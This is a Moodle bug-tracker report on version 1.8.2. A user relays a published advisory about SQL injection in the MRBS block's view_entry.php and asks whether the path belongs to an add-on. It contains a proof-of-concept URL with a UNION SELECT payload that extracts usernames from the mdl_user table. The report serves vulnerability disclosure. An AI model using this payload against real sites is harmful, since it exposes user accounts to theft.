-
Bug
-
Resolution: Fixed
-
Critical
-
1.8.2
-
None
-
Uncertain
-
Any
-
MOODLE_18_STABLE
-
MOODLE_18_STABLE
Hi,
A colleague passed along the following link to a potential security issue with Moodle 1.8.2. We cannot locate this "ing/blocks/mrdb/" path, so are not certain where in the stack the issue may surface, if at all. Might this be an add-on? (Apologies if this is a repeat of another issue: I did a search and could not find it.)
http://www.securityfocus.com/archive/1/485434
PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=[SQL]&day=27&month=10&year=2007
And a POC:
PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007
Thanks,
Jim